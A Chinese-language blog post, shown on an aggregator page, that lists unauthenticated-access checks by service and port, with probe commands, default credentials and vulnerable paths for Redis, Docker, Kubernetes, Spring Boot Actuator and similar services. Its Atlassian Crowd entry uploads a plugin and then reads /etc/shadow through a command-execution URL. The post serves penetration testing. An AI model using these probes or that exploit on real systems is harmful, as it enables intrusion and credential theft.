11

未授权访问漏洞总结

 3 years ago
source link: https://827607240.github.io/2020/12/14/ScanUnauthorized/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

未授权访问漏洞总结

[TOC]

ldap—–389

#! /usr/bin/env python
# _*_  coding:utf-8 _*_

from ldap3 import Connection,Server,ALL
def ldap_anonymous(ip):
    try:
        server = Server(ip,get_info=ALL,connect_timeout=1)
        conn = Connection(server, auto_bind=True)
        print "[+] ldap login for anonymous"
        conn.closed
    except:
        #pass
        print '[-] checking for ldap anonymous fail'

工具验证https://www.cnblogs.com/Zh1z3ven/p/13894171.html

http://www.ldapadmin.org/download/ldapadmin.html

RTSP—–554

RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域,为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或NVR中开启RTSP服务器。

漏洞验证

使用nmap扫描开放的端口和服务,初步判断后使用相关的工具的链接测试。

这里以VLC media player为例进行漏洞验证。单击“媒体”选项,选择“打开网络串流”。
在弹出的窗口中输入网络URL:
rtsp://admin:[email protected]:554/cam/realmonitor?channel=2&subtype=1

说明:
RTSP地址:rtsp://username:password@ip:port/cam/realmonitor?channel=1&subtype=0
username: 用户名。例如admin。
password: 密码。例如admin。
ip: 为设备IP。例如 192.168.1.1。
port: 端口号默认为554,若为默认可不填写。
channel: 通道号,起始为1。例如通道2,则为channel=2。
subtype: 码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)。
例如,请求某设备的通道2的辅码流,URL如下
rtsp://admin:[email protected]:554/cam/realmonitor?channel=2&subtype=1

rsync—–873—-

未授权访问测试

rsync rsync://172.16.2.250:873/

Lotus—–1352

访问/diiop_ior.nsf

nfs—–2049

未授权访问验证

showmount -e ip

Zookeeper—–2181—-

未授权访问测试

#获取该服务器的环境
echo envi|nc 172.16.2.251 2181

Docker—–2375—-

2375是docker远程操控的默认端口,通过这个端口可以直接对远程的docker daemon进行操作。

未授权访问测试

docker -H tcp://192.168.15.5:2375 version

kibana—–5601

未授权访问测试

直接访问kibana的页面,如:

https://10.10.4.89:5601/

https://10.10.4.89/app/kibana#

http://10.10.4.89:5601/app/kibana#/

并且无需账号密码可以登录进入界面。

VNC—–5900/5901

未授权访问测试

vncviewer 192.168.15.8

CouchDB —–5984—-

未授权访问测试

curl http://192.168.1.1:5984
curl http://192.168.1.1:5984/_config

redis—–6379—-

未授权访问测试

windows
redis-cli.exe -h 192.168.18.138 -p 6379

linux
redis-cli -h 192.168.18.138 -p 6379

Jenkins—–8080—-

未授权访问测试

访问http://192.168.1.1:8080/manage

JBOSS—–8080—-

未授权访问测试

http://192.168.1.1:8080/jmx-console/

spring—–8080

http://**.**.**.**/info
Spring Boot Actuator未授权访问
/dump - 显示线程转储(包括堆栈跟踪)
/autoconfig - 显示自动配置报告
/configprops - 显示配置属性
/trace - 显示最后几条HTTP消息(可能包含会话标识符)
/logfile - 输出日志文件的内容
/shutdown - 关闭应用程序
/info - 显示应用信息
/metrics - 显示当前应用的’指标’信息
/health - 显示应用程序的健康指标
/beans - 显示Spring Beans的完整列表
/mappings - 显示所有MVC控制器映射
/env - 提供对配置环境的访问
/restart - 重新启动应用程序
当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了 springboot 框架。

Kubernetes Api Server—–8080

未授权访问测试

端口:8080:http://10.10.4.89:8080/

端口:8080: api dashboard: http://10.10.4.89:8080/ui

端口:10250:端口是kubelet API的HTTPS端口,通过路径/pods获取环境变量、运行的容器信息、命名空间等信息。

http://10.10.4.89:10250/pods

Resin—–8080

http://www.example.com:8080/%20../web-inf

远程文件读取

Atlassian Crowd—–8095

未授权访问测试

curl --form "[email protected]" http://192.168.18.138:8095/crowd/admin/uploadplugin.action -v
访问地址并执行命令:http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

ActiveMQ—–8161

ActiveMQ默认使用8161端口,默认用户名和密码是admin/admin.

浏览器访问

Jupyter Notebook—–8888

访问 http://192.168.1.1:8888

SOLR—–8983

http://**.**.**.**/solr/#/
http://**.**.**.**/search.zip
http://**.**.**.**/search/

Elasticsearch—–9200/9300—-

未授权访问测试

curl http://localhost:9200/_nodes #查看节点数据

Memcached—–11211—–

未授权访问测试

telnet 10.0.4.138 11211
stats #查看memcache服务状态

Dubbo—–11211

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。

漏洞验证

telent IP port

RabbitMQ—–15672

RabbitMQ是目前非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。 消息可以是人类可读的JSON,简单字符串或可以转换为JSON字符串的值列表。

未授权访问测试

http://10.10.4.89:15672

http://10.10.4.89:25672/

http://10.10.4.89:15692/

默认账号密码都是guest

修复建议:

方法一:修改为强密码,删除默认的账号guest

方法二:禁止对外网开放,仅限于内部访问。

Mongodb—–27017—-

nmap -p 27017 --script mongodb-info <target>

Hadoop—–50070—-

未授权访问测试

访问 http://192.168.1.1:8088/cluster

Druid未授权访问

/druid/index.html
/druid/datasource.html
/druid/sql.html
/druid/wall.html
/druid/webapp.html
/druid/weburi.html
/druid/websession.html
/druid/spring.html
/druid/api.html

/system/druid/websession.html

/webpage/system/druid/websession.html(jeecg)

漏洞验证

访问相关的路径:http://10.20.37.152:7001/BSCC/druid/index.html

javaMelody

/monitoring路由

该漏洞修复比较简单,直接更新JavaMelody至1.74.0即可

批量检测脚本

检测部分未授权访问。https://github.com/test502git/Scanunauthorized

检测速度快, 支持批量, 多线程, 使用python3编写

把整理好的ip放到当前host.txt文本中,使用Python3运行该项目即可

http://www.0xby.com/3174.html


Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK